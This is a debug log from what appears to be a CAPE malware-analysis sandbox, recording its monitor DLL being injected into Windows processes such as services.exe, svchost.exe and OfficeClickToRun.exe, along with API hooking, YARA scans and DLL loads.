2025-12-08 08:32:38,814 [root] DEBUG: 1876: YaraScan: Scanning 0x7FF40000, size 0x88
2025-12-08 08:32:38,845 [root] INFO: Process with pid 1876 has terminated
2025-12-08 08:32:58,580 [root] DEBUG: 1236: CreateProcessHandler: Injection info set for new process 3252: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe, ImageBase: 0x00A00000
2025-12-08 08:32:58,580 [root] INFO: Announced 32-bit process name: OfficeClickToRun.exe pid: 3252
2025-12-08 08:32:58,580 [lib.api.process] INFO: Monitor config for <Process 3252 OfficeClickToRun.exe>: C:\tmp76j_8pz8\dll\3252.ini
2025-12-08 08:32:58,580 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmp76j_8pz8\dll\AVhNcK.dll, loader C:\tmp76j_8pz8\bin\Hlvfqvk.exe
2025-12-08 08:32:58,595 [root] DEBUG: Loader: Injecting process 3252 (thread 3116) with C:\tmp76j_8pz8\dll\AVhNcK.dll.
2025-12-08 08:32:58,595 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2025-12-08 08:32:58,595 [root] DEBUG: Successfully injected DLL C:\tmp76j_8pz8\dll\AVhNcK.dll.
2025-12-08 08:32:58,595 [lib.api.process] INFO: Injected into 32-bit <Process 3252 OfficeClickToRun.exe>
2025-12-08 08:32:58,595 [root] INFO: Announced 32-bit process name: OfficeClickToRun.exe pid: 3252
2025-12-08 08:32:58,595 [lib.api.process] INFO: Monitor config for <Process 3252 OfficeClickToRun.exe>: C:\tmp76j_8pz8\dll\3252.ini
2025-12-08 08:32:58,595 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmp76j_8pz8\dll\AVhNcK.dll, loader C:\tmp76j_8pz8\bin\Hlvfqvk.exe
2025-12-08 08:32:58,595 [root] DEBUG: Loader: Injecting process 3252 (thread 3116) with C:\tmp76j_8pz8\dll\AVhNcK.dll.
2025-12-08 08:32:58,611 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2025-12-08 08:32:58,611 [root] DEBUG: Successfully injected DLL C:\tmp76j_8pz8\dll\AVhNcK.dll.
2025-12-08 08:32:58,611 [lib.api.process] INFO: Injected into 32-bit <Process 3252 OfficeClickToRun.exe>
2025-12-08 08:32:58,642 [root] DEBUG: 1236: DLL loaded at 0x6FC90000: C:\Windows\system32\sfc (0x3000 bytes).
2025-12-08 08:32:58,642 [root] DEBUG: 1236: DLL loaded at 0x6CC50000: C:\Windows\system32\sfc_os (0xd000 bytes).
2025-12-08 08:32:58,642 [root] DEBUG: 1236: DLL loaded at 0x74C40000: C:\Windows\system32\DEVRTL (0xe000 bytes).
2025-12-08 08:32:58,658 [root] DEBUG: 1236: DLL loaded at 0x72260000: C:\Windows\system32\MPR (0x12000 bytes).
2025-12-08 08:32:58,689 [root] INFO: Announced starting service "b'PcaSvc'"
2025-12-08 08:32:58,689 [lib.api.process] INFO: Monitor config for <Process 376 services.exe>: C:\tmp76j_8pz8\dll\376.ini
2025-12-08 08:32:58,689 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmp76j_8pz8\dll\AVhNcK.dll, loader C:\tmp76j_8pz8\bin\Hlvfqvk.exe
2025-12-08 08:32:58,705 [root] DEBUG: Loader: Injecting process 376 with C:\tmp76j_8pz8\dll\AVhNcK.dll.
2025-12-08 08:32:58,720 [root] DEBUG: 376: Python path set to 'C:\Python38'.
2025-12-08 08:32:58,720 [root] INFO: Disabling sleep skipping.
2025-12-08 08:32:58,720 [root] DEBUG: 376: Dropped file limit defaulting to 100.
2025-12-08 08:32:58,720 [root] DEBUG: 376: parent_has_path: unable to get path for parent process 328
2025-12-08 08:32:58,720 [root] DEBUG: 376: YaraInit: Compiled rules loaded from existing file C:\tmp76j_8pz8\data\yara\capemon.yac
2025-12-08 08:32:58,720 [root] DEBUG: 376: YaraScan: Scanning 0x00A70000, size 0x40944
2025-12-08 08:32:58,720 [root] DEBUG: 376: Monitor initialised: 32-bit capemon loaded in process 376 at 0x6c9a0000, thread 3404, image base 0xa70000, stack from 0xc16000-0xc20000
2025-12-08 08:32:58,720 [root] DEBUG: 376: Commandline: C:\Windows\system32\services.exe
2025-12-08 08:32:58,720 [root] DEBUG: 376: GetAddressByYara: ModuleBase 0x774E0000 FunctionName LdrpCallInitRoutine
2025-12-08 08:32:58,736 [root] DEBUG: 376: hook_api: LdrpCallInitRoutine export address 0x77538810 obtained via GetFunctionAddress
2025-12-08 08:32:58,736 [root] DEBUG: 376: hook_api: Warning - CreateRemoteThreadEx export address 0x764AF98F differs from GetProcAddress -> 0x754EBB18 (KERNELBASE.dll::0xbb18)
2025-12-08 08:32:58,736 [root] DEBUG: 376: hook_api: Warning - UpdateProcThreadAttribute export address 0x764B020F differs from GetProcAddress -> 0x754F43FB (KERNELBASE.dll::0x143fb)
2025-12-08 08:32:58,736 [root] WARNING: b'Unable to place hook on GetCommandLineA'
2025-12-08 08:32:58,736 [root] DEBUG: 376: set_hooks: Unable to hook GetCommandLineA
2025-12-08 08:32:58,736 [root] WARNING: b'Unable to place hook on GetCommandLineW'
2025-12-08 08:32:58,736 [root] DEBUG: 376: set_hooks: Unable to hook GetCommandLineW
2025-12-08 08:32:58,736 [root] DEBUG: 376: Hooked 611 out of 613 functions
2025-12-08 08:32:58,736 [root] DEBUG: 376: WoW64 not detected.
2025-12-08 08:32:58,736 [root] INFO: Loaded monitor into process with pid 376
2025-12-08 08:32:58,736 [root] DEBUG: InjectDllViaThread: Successfully injected Dll into process via RtlCreateUserThread.
2025-12-08 08:32:58,736 [root] DEBUG: Successfully injected DLL C:\tmp76j_8pz8\dll\AVhNcK.dll.
2025-12-08 08:32:58,736 [lib.api.process] INFO: Injected into 32-bit <Process 376 services.exe>
2025-12-08 08:33:00,736 [root] DEBUG: 376: caller_dispatch: Added region at 0x00A70000 to tracked regions list (ntdll::memcpy returns to 0x00A72E8F, thread 2612).
2025-12-08 08:33:00,736 [root] DEBUG: 376: YaraScan: Scanning 0x00A70000, size 0x40944
2025-12-08 08:33:00,736 [root] DEBUG: 376: ProcessImageBase: Main module image at 0x00A70000 unmodified (entropy change 0.000000e+00)
2025-12-08 08:33:00,736 [root] DEBUG: 376: CreateProcessHandler: Injection info set for new process 3664: C:\Windows\system32\svchost.exe, ImageBase: 0x00F00000
2025-12-08 08:33:00,736 [root] INFO: Announced 32-bit process name: svchost.exe pid: 3664
2025-12-08 08:33:00,751 [lib.api.process] INFO: Monitor config for <Process 3664 svchost.exe>: C:\tmp76j_8pz8\dll\3664.ini
2025-12-08 08:33:00,751 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmp76j_8pz8\dll\AVhNcK.dll, loader C:\tmp76j_8pz8\bin\Hlvfqvk.exe
2025-12-08 08:33:00,751 [root] DEBUG: Loader: Injecting process 3664 (thread 3684) with C:\tmp76j_8pz8\dll\AVhNcK.dll.
2025-12-08 08:33:00,751 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2025-12-08 08:33:00,751 [root] DEBUG: Successfully injected DLL C:\tmp76j_8pz8\dll\AVhNcK.dll.
2025-12-08 08:33:00,751 [lib.api.process] INFO: Injected into 32-bit <Process 3664 svchost.exe>
2025-12-08 08:33:00,751 [root] INFO: Announced 32-bit process name: svchost.exe pid: 3664
2025-12-08 08:33:00,751 [lib.api.process] INFO: Monitor config for <Process 3664 svchost.exe>: C:\tmp76j_8pz8\dll\3664.ini
2025-12-08 08:33:00,751 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmp76j_8pz8\dll\AVhNcK.dll, loader C:\tmp76j_8pz8\bin\Hlvfqvk.exe
2025-12-08 08:33:00,767 [root] DEBUG: Loader: Injecting process 3664 (thread 3684) with C:\tmp76j_8pz8\dll\AVhNcK.dll.
2025-12-08 08:33:00,767 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2025-12-08 08:33:00,767 [root] DEBUG: Successfully injected DLL C:\tmp76j_8pz8\dll\AVhNcK.dll.
2025-12-08 08:33:00,767 [lib.api.process] INFO: Injected into 32-bit <Process 3664 svchost.exe>
2025-12-08 08:33:00,783 [root] DEBUG: 3664: Python path set to 'C:\Python38'.
2025-12-08 08:33:00,783 [root] DEBUG: 3664: Dropped file limit defaulting to 100.
2025-12-08 08:33:00,783 [root] DEBUG: 3664: parent_has_path: unable to get path for parent process 376
2025-12-08 08:33:00,783 [root] INFO: Disabling sleep skipping.
2025-12-08 08:33:00,783 [root] DEBUG: 3664: YaraInit: Compiled rules loaded from existing file C:\tmp76j_8pz8\data\yara\capemon.yac
2025-12-08 08:33:00,783 [root] DEBUG: 3664: YaraScan: Scanning 0x00F00000, size 0x73ca
2025-12-08 08:33:00,783 [root] DEBUG: 3664: Monitor initialised: 32-bit capemon loaded in process 3664 at 0x6c9a0000, thread 3684, image base 0xf00000, stack from 0x1d6000-0x1e0000
2025-12-08 08:33:00,783 [root] DEBUG: 3664: Commandline: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted
2025-12-08 08:33:00,783 [root] DEBUG: 3664: GetAddressByYara: ModuleBase 0x774E0000 FunctionName LdrpCallInitRoutine
2025-12-08 08:33:00,798 [root] DEBUG: 3664: hook_api: LdrpCallInitRoutine export address 0x77538810 obtained via GetFunctionAddress
2025-12-08 08:33:00,798 [root] DEBUG: 3664: hook_api: Warning - CreateRemoteThreadEx export address 0x764AF98F differs from GetProcAddress -> 0x754EBB18 (KERNELBASE.dll::0xbb18)
2025-12-08 08:33:00,798 [root] DEBUG: 3664: hook_api: Warning - UpdateProcThreadAttribute export address 0x764B020F differs from GetProcAddress -> 0x754F43FB (KERNELBASE.dll::0x143fb)
2025-12-08 08:33:00,798 [root] WARNING: b'Unable to place hook on GetCommandLineA'
2025-12-08 08:33:00,798 [root] DEBUG: 3664: set_hooks: Unable to hook GetCommandLineA
2025-12-08 08:33:00,798 [root] WARNING: b'Unable to place hook on GetCommandLineW'
2025-12-08 08:33:00,798 [root] DEBUG: 3664: set_hooks: Unable to hook GetCommandLineW
2025-12-08 08:33:00,798 [root] DEBUG: 3664: Hooked 611 out of 613 functions
2025-12-08 08:33:00,798 [root] DEBUG: 3664: WoW64 not detected.
2025-12-08 08:33:00,798 [root] INFO: Loaded monitor into process with pid 3664
2025-12-08 08:33:00,798 [root] DEBUG: 3664: caller_dispatch: Added region at 0x00F00000 to tracked regions list (kernel32::GetSystemTimeAsFileTime returns to 0x00F01E10, thread 3684).
2025-12-08 08:33:00,798 [root] DEBUG: 3664: YaraScan: Scanning 0x00F00000, size 0x73ca
2025-12-08 08:33:00,798 [root] DEBUG: 3664: ProcessImageBase: Main module image at 0x00F00000 unmodified (entropy change 0.000000e+00)
2025-12-08 08:33:00,798 [root] DEBUG: 3664: DLL loaded at 0x753E0000: C:\Windows\system32\CRYPTBASE (0xc000 bytes).
2025-12-08 08:33:00,814 [root] DEBUG: 3664: DLL loaded at 0x76100000: C:\Windows\system32\CLBCatQ (0x83000 bytes).
2025-12-08 08:33:00,814 [root] DEBUG: 3664: DLL loaded at 0x75D80000: C:\Windows\system32\OLEAUT32 (0x8f000 bytes).
2025-12-08 08:33:00,830 [root] DEBUG: 3664: DLL loaded at 0x5F0C0000: c:\windows\system32\pcasvc (0x28000 bytes).
2025-12-08 08:33:00,830 [root] DEBUG: 3664: DLL loaded at 0x75390000: c:\windows\system32\apphelp (0x4c000 bytes).
2025-12-08 08:33:00,830 [root] DEBUG: 3664: DLL loaded at 0x5F080000: c:\windows\system32\AEPIC (0x35000 bytes).
2025-12-08 08:33:00,892 [root] DEBUG: 3664: DLL loaded at 0x766D0000: C:\Windows\system32\SHELL32 (0xc4c000 bytes).
2025-12-08 08:33:00,908 [root] DEBUG: 3664: DLL loaded at 0x6CC50000: c:\windows\system32\sfc (0x3000 bytes).
2025-12-08 08:33:00,923 [root] DEBUG: 3664: DLL loaded at 0x6FC90000: c:\windows\system32\sfc_os (0xd000 bytes).
2025-12-08 08:33:00,923 [root] DEBUG: 3664: DLL loaded at 0x74960000: c:\windows\system32\VERSION (0x9000 bytes).
2025-12-08 08:33:00,923 [root] DEBUG: 3664: DLL loaded at 0x750A0000: c:\windows\system32\wevtapi (0x42000 bytes).
2025-12-08 08:33:00,939 [root] DEBUG: 3664: DLL loaded at 0x75450000: C:\Windows\system32\RpcRtRemote (0xe000 bytes).
2025-12-08 08:33:00,939 [root] INFO: Announced starting service "b'PcaSvc'"
2025-12-08 08:33:00,939 [root] DEBUG: 3664: api-rate-cap: RegEnumKeyExW hook disabled due to rate
2025-12-08 08:33:00,939 [root] DEBUG: 3664: api-rate-cap: memcpy hook disabled due to rate
2025-12-08 08:33:01,939 [root] DEBUG: 3664: OpenProcessHandler: Injection info created for process 1236, handle 0x1ac: C:\Windows\explorer.exe
2025-12-08 08:33:01,939 [root] DEBUG: 3664: OpenProcessHandler: Image base for process 3252 (handle 0x1b4): 0x00A00000.
2025-12-08 08:33:01,939 [root] DEBUG: 3664: OpenProcessHandler: Injection info created for process 3252, handle 0x1b4: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe
2025-12-08 08:33:01,955 [root] DEBUG: 3252: Python path set to 'C:\Python38'.
2025-12-08 08:33:01,970 [root] DEBUG: 3252: Dropped file limit defaulting to 100.
2025-12-08 08:33:01,970 [root] INFO: Disabling sleep skipping.
2025-12-08 08:33:01,986 [root] DEBUG: 3252: YaraInit: Compiled rules loaded from existing file C:\tmp76j_8pz8\data\yara\capemon.yac
2025-12-08 08:33:01,986 [root] DEBUG: 3252: YaraScan: Scanning 0x00A00000, size 0x4ff29e
2025-12-08 08:33:02,001 [root] DEBUG: 3252: Monitor initialised: 32-bit capemon loaded in process 3252 at 0x6c9a0000, thread 3116, image base 0xa00000, stack from 0x236000-0x240000
2025-12-08 08:33:02,001 [root] DEBUG: 3252: Commandline: "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /user
2025-12-08 08:33:02,001 [root] DEBUG: 3252: GetAddressByYara: ModuleBase 0x774E0000 FunctionName LdrpCallInitRoutine
2025-12-08 08:33:02,017 [root] DEBUG: 3252: hook_api: LdrpCallInitRoutine export address 0x77538810 obtained via GetFunctionAddress
2025-12-08 08:33:02,017 [root] DEBUG: 3252: hook_api: Warning - CreateRemoteThreadEx export address 0x764AF98F differs from GetProcAddress -> 0x754EBB18 (KERNELBASE.dll::0xbb18)
2025-12-08 08:33:02,017 [root] DEBUG: 3252: hook_api: Warning - UpdateProcThreadAttribute export address 0x764B020F differs from GetProcAddress -> 0x754F43FB (KERNELBASE.dll::0x143fb)
2025-12-08 08:33:02,017 [root] WARNING: b'Unable to place hook on GetCommandLineA'
2025-12-08 08:33:02,017 [root] DEBUG: 3252: set_hooks: Unable to hook GetCommandLineA
2025-12-08 08:33:02,017 [root] WARNING: b'Unable to place hook on GetCommandLineW'
2025-12-08 08:33:02,017 [root] DEBUG: 3252: set_hooks: Unable to hook GetCommandLineW
2025-12-08 08:33:02,017 [root] DEBUG: 3252: Hooked 611 out of 613 functions
2025-12-08 08:33:02,017 [root] DEBUG: 3252: WoW64 not detected.
2025-12-08 08:33:02,017 [root] INFO: Loaded monitor into process with pid 3252
2025-12-08 08:33:02,033 [root] DEBUG: 3252: YaraScan: Scanning 0x73110000, size 0xdb862
2025-12-08 08:33:02,033 [root] DEBUG: 3252: caller_dispatch: Added region at 0x73110000 to tracked regions list (ntdll::LdrLoadDll returns to 0x73157FCC, thread 3116).
2025-12-08 08:33:02,033 [root] DEBUG: 3252: ProcessTrackedRegion: Region at 0x73110000 mapped as \Device\HarddiskVolume2\Program Files\Common Files\microsoft shared\ClickToRun\ucrtbase.dll, skipping
2025-12-08 08:33:02,033 [root] DEBUG: 3252: YaraScan: Scanning 0x73200000, size 0x13a92
2025-12-08 08:33:02,033 [root] DEBUG: 3252: caller_dispatch: Added region at 0x73200000 to tracked regions list (ntdll::LdrLoadDll returns to 0x73204996, thread 3116).
2025-12-08 08:33:02,033 [root] DEBUG: 3252: ProcessTrackedRegion: Region at 0x73200000 mapped as \Device\HarddiskVolume2\Program Files\Common Files\microsoft shared\ClickToRun\vcruntime140.dll, skipping
2025-12-08 08:33:02,033 [root] DEBUG: 3252: YaraScan: Scanning 0x73000000, size 0x6ca34
2025-12-08 08:33:02,033 [root] DEBUG: 3252: YaraScan: Scanning 0x72F30000, size 0x29aae
2025-12-08 08:33:02,033 [root] DEBUG: 3252: caller_dispatch: Added region at 0x72F30000 to tracked regions list (ntdll::LdrLoadDll returns to 0x72F3BF9F, thread 3116).
2025-12-08 08:33:02,033 [root] DEBUG: 3252: ProcessTrackedRegion: Region at 0x72F30000 mapped as \Device\HarddiskVolume2\Program Files\Common Files\microsoft shared\ClickToRun\ApiClient.dll, skipping
2025-12-08 08:33:02,033 [root] DEBUG: 3252: caller_dispatch: Added region at 0x00A00000 to tracked regions list (kernel32::GetSystemTimeAsFileTime returns to 0x00CA71FE, thread 3116).
2025-12-08 08:33:02,048 [root] DEBUG: 3252: YaraScan: Scanning 0x00A00000, size 0x4ff29e
2025-12-08 08:33:02,064 [root] DEBUG: 3252: ProcessImageBase: Main module image at 0x00A00000 unmodified (entropy change 0.000000e+00)
2025-12-08 08:33:02,080 [root] DEBUG: 3252: DLL loaded at 0x753E0000: C:\Windows\system32\CRYPTBASE (0xc000 bytes).
2025-12-08 08:33:02,080 [root] DEBUG: 3252: caller_dispatch: Added region at 0x73000000 to tracked regions list (kernel32::GetSystemTimeAsFileTime returns to 0x7303A506, thread 3116).
2025-12-08 08:33:02,080 [root] DEBUG: 3252: ProcessTrackedRegion: Region at 0x73000000 mapped as \Device\HarddiskVolume2\Program Files\Common Files\microsoft shared\ClickToRun\msvcp140.dll, skipping
2025-12-08 08:33:02,095 [root] DEBUG: 3252: DLL loaded at 0x72CE0000: C:\Windows\system32\msi (0x246000 bytes).
2025-12-08 08:33:02,095 [root] DEBUG: 3252: DLL loaded at 0x766D0000: C:\Windows\system32\SHELL32 (0xc4c000 bytes).
2025-12-08 08:33:02,095 [root] DEBUG: 3252: api-rate-cap: memcpy hook disabled due to rate
2025-12-08 08:33:02,111 [root] DEBUG: 3252: DLL loaded at 0x754D0000: C:\Windows\system32\profapi (0xb000 bytes).
2025-12-08 08:33:02,111 [root] DEBUG: 3252: DLL loaded at 0x75350000: C:\Windows\system32\Secur32 (0x8000 bytes).
2025-12-08 08:33:02,126 [root] DEBUG: 3252: DLL loaded at 0x74960000: C:\Windows\system32\VERSION (0x9000 bytes).
2025-12-08 08:33:02,126 [root] DEBUG: 3252: DLL loaded at 0x76100000: C:\Windows\system32\CLBCatQ (0x83000 bytes).
2025-12-08 08:33:02,126 [root] INFO: Added new file to list with pid None and path C:\Users\user\AppData\Local\Temp\USERDUM-NNN0BL9-20251208-1633.log
2025-12-08 08:33:02,142 [root] DEBUG: 3252: DLL loaded at 0x72B10000: C:\Windows\System32\netprofm (0x5a000 bytes).
2025-12-08 08:33:02,142 [root] DEBUG: 3252: DLL loaded at 0x72C90000: C:\Windows\System32\nlaapi (0x10000 bytes).
2025-12-08 08:33:02,142 [root] DEBUG: 3252: DLL loaded at 0x743F0000: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\Comctl32 (0x19e000 bytes).
2025-12-08 08:33:02,142 [root] DEBUG: 3252: DLL loaded at 0x74170000: C:\Windows\system32\uxtheme (0x40000 bytes).
2025-12-08 08:33:02,158 [root] DEBUG: 3252: DLL loaded at 0x75450000: C:\Windows\system32\RpcRtRemote (0xe000 bytes).
2025-12-08 08:33:02,158 [root] DEBUG: 3252: DLL loaded at 0x77630000: C:\Windows\system32\Normaliz (0x3000 bytes).
2025-12-08 08:33:02,158 [root] DEBUG: 3252: DLL loaded at 0x75E10000: C:\Windows\system32\urlmon (0x14a000 bytes).
2025-12-08 08:33:02,158 [root] DEBUG: 3252: DLL loaded at 0x75790000: C:\Windows\system32\api-ms-win-downlevel-ole32-l1-1-0 (0x4000 bytes).
2025-12-08 08:33:02,158 [root] DEBUG: 3252: DLL loaded at 0x757E0000: C:\Windows\system32\api-ms-win-downlevel-shlwapi-l1-1-0 (0x4000 bytes).
2025-12-08 08:33:02,158 [root] DEBUG: 3252: DLL loaded at 0x755C0000: C:\Windows\system32\api-ms-win-downlevel-advapi32-l1-1-0 (0x5000 bytes).
2025-12-08 08:33:02,158 [root] DEBUG: 3252: DLL loaded at 0x75610000: C:\Windows\system32\api-ms-win-downlevel-user32-l1-1-0 (0x4000 bytes).
2025-12-08 08:33:02,158 [root] DEBUG: 3252: DLL loaded at 0x75620000: C:\Windows\system32\api-ms-win-downlevel-version-l1-1-0 (0x4000 bytes).
2025-12-08 08:33:02,158 [root] DEBUG: 3252: DLL loaded at 0x75600000: C:\Windows\system32\api-ms-win-downlevel-normaliz-l1-1-0 (0x3000 bytes).
2025-12-08 08:33:02,158 [root] DEBUG: 3252: DLL loaded at 0x761B0000: C:\Windows\system32\iertutil (0x232000 bytes).
2025-12-08 08:33:02,173 [root] DEBUG: 3252: DLL loaded at 0x75920000: C:\Windows\system32\WININET (0x1e4000 bytes).
2025-12-08 08:33:02,173 [root] DEBUG: 3252: DLL loaded at 0x757C0000: C:\Windows\system32\USERENV (0x17000 bytes).
2025-12-08 08:33:02,173 [root] DEBUG: 3252: DLL loaded at 0x74ED0000: C:\Windows\system32\CRYPTSP (0x16000 bytes).
2025-12-08 08:33:02,173 [root] DEBUG: 3252: DLL loaded at 0x74C60000: C:\Windows\system32\rsaenh (0x3b000 bytes).
2025-12-08 08:33:02,189 [root] DEBUG: 3252: DLL loaded at 0x72CD0000: C:\Windows\system32\api-ms-win-downlevel-advapi32-l2-1-0 (0x4000 bytes).
2025-12-08 08:33:02,189 [root] DEBUG: 3252: api-rate-cap: GetSystemTimeAsFileTime hook disabled due to rate
2025-12-08 08:33:02,189 [root] DEBUG: 3252: DLL loaded at 0x74B90000: C:\Windows\system32\credssp (0x8000 bytes).
2025-12-08 08:33:02,205 [root] DEBUG: 3252: DLL loaded at 0x73E80000: C:\Windows\system32\dwmapi (0x13000 bytes).
2025-12-08 08:33:02,205 [root] DEBUG: 3252: api-rate-cap: NtDelayExecution hook disabled due to rate
2025-12-08 08:33:02,220 [root] DEBUG: 3252: DLL loaded at 0x722C0000: C:\Windows\System32\msxml6 (0x158000 bytes).
2025-12-08 08:33:02,236 [root] DEBUG: 3252: DLL loaded at 0x72BF0000: C:\Windows\system32\winhttp (0x58000 bytes).
2025-12-08 08:33:02,267 [root] DEBUG: 3252: DLL loaded at 0x72BA0000: C:\Windows\system32\webio (0x50000 bytes).
2025-12-08 08:33:02,267 [root] DEBUG: 3252: DLL loaded at 0x6FB50000: C:\Windows\system32\api-ms-win-downlevel-shlwapi-l2-1-0 (0x4000 bytes).
2025-12-08 08:33:02,330 [root] DEBUG: 3252: DLL loaded at 0x74D50000: C:\Windows\system32\DNSAPI (0x44000 bytes).
2025-12-08 08:33:02,330 [root] DEBUG: 3252: DLL loaded at 0x74E90000: C:\Windows\system32\mswsock (0x3c000 bytes).
2025-12-08 08:33:02,330 [root] DEBUG: 3252: DLL loaded at 0x74E80000: C:\Windows\System32\wship6 (0x6000 bytes).
2025-12-08 08:33:02,361 [root] DEBUG: 3252: DLL loaded at 0x72C80000: C:\Windows\System32\npmproxy (0x8000 bytes).
2025-12-08 08:33:02,361 [root] DEBUG: 3252: DLL loaded at 0x72BF0000: C:\Windows\system32\WINHTTP (0x58000 bytes).
2025-12-08 08:33:02,361 [root] DEBUG: 3252: DLL loaded at 0x72BA0000: C:\Windows\system32\webio (0x50000 bytes).
2025-12-08 08:33:02,361 [root] DEBUG: 3252: DLL loaded at 0x735C0000: C:\Windows\system32\dhcpcsvc6 (0xd000 bytes).
2025-12-08 08:33:02,361 [root] DEBUG: 3252: DLL loaded at 0x73540000: C:\Windows\system32\dhcpcsvc (0x12000 bytes).
2025-12-08 08:33:02,376 [root] DEBUG: 3252: DLL loaded at 0x749F0000: C:\Windows\System32\wshtcpip (0x5000 bytes).
2025-12-08 08:33:02,376 [root] DEBUG: 3252: DLL loaded at 0x72500000: C:\Windows\system32\rasadhlp (0x6000 bytes).
2025-12-08 08:33:02,392 [root] DEBUG: 3252: DLL loaded at 0x72620000: C:\Windows\system32\napinsp (0x10000 bytes).
2025-12-08 08:33:02,392 [root] DEBUG: 556: CreateProcessHandler: Injection info set for new process 2468: C:\Windows\system32\DllHost.exe, ImageBase: 0x00610000
2025-12-08 08:33:02,392 [root] DEBUG: 3252: DLL loaded at 0x70F50000: C:\Windows\system32\pnrpnsp (0x12000 bytes).
2025-12-08 08:33:02,392 [root] INFO: Announced 32-bit process name: dllhost.exe pid: 2468
2025-12-08 08:33:02,392 [root] DEBUG: 3252: DLL loaded at 0x72610000: C:\Windows\System32\winrnr (0x8000 bytes).
2025-12-08 08:33:02,392 [lib.api.process] INFO: Monitor config for <Process 2468 dllhost.exe>: C:\tmp76j_8pz8\dll\2468.ini
2025-12-08 08:33:02,392 [root] DEBUG: 3252: DLL loaded at 0x73600000: C:\Windows\System32\fwpuclnt (0x38000 bytes).
2025-12-08 08:33:02,392 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmp76j_8pz8\dll\AVhNcK.dll, loader C:\tmp76j_8pz8\bin\Hlvfqvk.exe
2025-12-08 08:33:02,408 [root] DEBUG: Loader: Injecting process 2468 (thread 2100) with C:\tmp76j_8pz8\dll\AVhNcK.dll.
2025-12-08 08:33:02,408 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2025-12-08 08:33:02,408 [root] DEBUG: Successfully injected DLL C:\tmp76j_8pz8\dll\AVhNcK.dll.
2025-12-08 08:33:02,408 [lib.api.process] INFO: Injected into 32-bit <Process 2468 dllhost.exe>
2025-12-08 08:33:02,423 [root] INFO: Announced 32-bit process name: dllhost.exe pid: 2468
2025-12-08 08:33:02,423 [lib.api.process] INFO: Monitor config for <Process 2468 dllhost.exe>: C:\tmp76j_8pz8\dll\2468.ini
2025-12-08 08:33:02,423 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmp76j_8pz8\dll\AVhNcK.dll, loader C:\tmp76j_8pz8\bin\Hlvfqvk.exe
2025-12-08 08:33:02,423 [root] DEBUG: Loader: Injecting process 2468 (thread 2100) with C:\tmp76j_8pz8\dll\AVhNcK.dll.
2025-12-08 08:33:02,439 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2025-12-08 08:33:02,439 [root] DEBUG: Successfully injected DLL C:\tmp76j_8pz8\dll\AVhNcK.dll.
2025-12-08 08:33:02,439 [lib.api.process] INFO: Injected into 32-bit <Process 2468 dllhost.exe>
2025-12-08 08:33:02,455 [root] DEBUG: 2468: Python path set to 'C:\Python38'.
2025-12-08 08:33:02,455 [root] DEBUG: 2468: Dropped file limit defaulting to 100.
2025-12-08 08:33:02,455 [root] INFO: Disabling sleep skipping.
2025-12-08 08:33:02,455 [root] DEBUG: 2468: YaraInit: Compiled rules loaded from existing file C:\tmp76j_8pz8\data\yara\capemon.yac
2025-12-08 08:33:02,455 [root] DEBUG: 2468: YaraScan: Scanning 0x00610000, size 0x4114
2025-12-08 08:33:02,455 [root] DEBUG: 2468: Monitor initialised: 32-bit capemon loaded in process 2468 at 0x6c9a0000, thread 2100, image base 0x610000, stack from 0x176000-0x180000
2025-12-08 08:33:02,455 [root] DEBUG: 2468: Commandline: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
2025-12-08 08:33:02,455 [root] DEBUG: 2468: GetAddressByYara: ModuleBase 0x774E0000 FunctionName LdrpCallInitRoutine
2025-12-08 08:33:02,470 [root] DEBUG: 2468: hook_api: LdrpCallInitRoutine export address 0x77538810 obtained via GetFunctionAddress
2025-12-08 08:33:02,470 [root] DEBUG: 2468: hook_api: Warning - CreateRemoteThreadEx export address 0x764AF98F differs from GetProcAddress -> 0x754EBB18 (KERNELBASE.dll::0xbb18)
2025-12-08 08:33:02,470 [root] DEBUG: 2468: hook_api: Warning - UpdateProcThreadAttribute export address 0x764B020F differs from GetProcAddress -> 0x754F43FB (KERNELBASE.dll::0x143fb)
2025-12-08 08:33:02,470 [root] WARNING: b'Unable to place hook on GetCommandLineA'
2025-12-08 08:33:02,470 [root] DEBUG: 2468: set_hooks: Unable to hook GetCommandLineA
2025-12-08 08:33:02,470 [root] WARNING: b'Unable to place hook on GetCommandLineW'
2025-12-08 08:33:02,470 [root] DEBUG: 2468: set_hooks: Unable to hook GetCommandLineW
2025-12-08 08:33:02,470 [root] DEBUG: 2468: Hooked 611 out of 613 functions
2025-12-08 08:33:02,486 [root] DEBUG: 2468: WoW64 not detected.
2025-12-08 08:33:02,486 [root] INFO: Loaded monitor into process with pid 2468
2025-12-08 08:33:02,486 [root] DEBUG: 2468: caller_dispatch: Added region at 0x00610000 to tracked regions list (kernel32::GetSystemTimeAsFileTime returns to 0x0061193E, thread 2100).
2025-12-08 08:33:02,486 [root] DEBUG: 2468: YaraScan: Scanning 0x00610000, size 0x4114
2025-12-08 08:33:02,486 [root] DEBUG: 2468: ProcessImageBase: Main module image at 0x00610000 unmodified (entropy change 0.000000e+00)
2025-12-08 08:33:02,486 [root] DEBUG: 2468: DLL loaded at 0x753E0000: C:\Windows\system32\CRYPTBASE (0xc000 bytes).
2025-12-08 08:33:02,486 [root] DEBUG: 2468: DLL loaded at 0x76100000: C:\Windows\system32\CLBCatQ (0x83000 bytes).
2025-12-08 08:33:02,486 [root] DEBUG: 2468: DLL loaded at 0x75D80000: C:\Windows\system32\OLEAUT32 (0x8f000 bytes).
